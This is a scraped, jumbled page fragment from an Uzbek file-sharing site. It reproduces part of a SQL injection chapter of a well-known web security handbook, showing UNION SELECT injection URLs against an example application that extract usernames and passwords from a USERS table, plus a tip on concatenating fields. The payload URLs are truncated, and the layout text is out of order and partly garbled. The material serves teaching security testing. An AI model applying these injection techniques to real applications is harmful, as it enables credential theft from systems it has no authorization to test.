The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

Download 5,76 Mb.

Pdf ko'rish

bet	468/875
Sana	01.01.2022
Hajmi	5,76 Mb.
	#293004

1 ... 464 465 466 467 468 469 470 471 ... 875

Bog'liq
3794 1008 4334

T I P In the attack just described, there are two columns available for retrieving
An MS-SQL Hack

ID

EMPLOYEE

JOB

7521

WARD

SALESMAN

PASSWORD

PRIVILEGE

SESSIONID

WORD

This output confirms that the

USERS

table does indeed contain sensitive

data, including passwords and session tokens. We now have everything we

need to extract any of this information. For example:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

7521

WARD

SALESMAN

admin

0wned

marcus

marcus1

Chapter 9

■

Injecting Code

259

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 259

T I P

In the attack just described, there are two columns available for retrieving

data, and the easiest exploit is to use both. If only one field were available, the

same attack could be carried out by concatenating multiple items of extracted

data into a single field. For example, the following URL would retrieve

usernames and passwords within just the Employee field, separated by a colon:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

Let’s take a look at a similar attack being performed against an MS-SQL data-

base. Consider a retailing application that allows users to search a product cat-

alog. A typical search uses the following URL:

https://wahh-app.com/products.asp?q=hub

This search returns the following results:

Download 5,76 Mb.

Do'stlaringiz bilan baham:

1 ... 464 465 466 467 468 469 470 471 ... 875